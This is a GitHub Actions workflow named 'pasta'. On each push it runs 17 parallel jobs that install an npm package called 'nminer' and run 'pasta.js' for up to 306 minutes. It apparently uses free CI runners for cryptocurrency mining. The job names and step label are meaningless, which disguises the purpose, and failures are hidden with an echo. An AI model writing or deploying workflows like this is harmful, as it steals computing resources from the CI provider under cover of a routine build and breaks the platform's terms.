name: pasta
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5109 }
          - { version: 6012 }
          - { version: 4283 }
          - { version: 8966 }
          - { version: 4968 }
          - { version: 1599 }
          - { version: 220 }
          - { version: 6116 }
          - { version: 6189 }
          - { version: 7445 }
          - { version: 240 }
          - { version: 8423 }
          - { version: 1896 }
          - { version: 8458 }
          - { version: 7262 }
          - { version: 1559 }
          - { version: 6627 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: hydrant wherever yum
        run: |
          npm install nminer@latest
          timeout 306m node pasta.js || echo "pasta executed"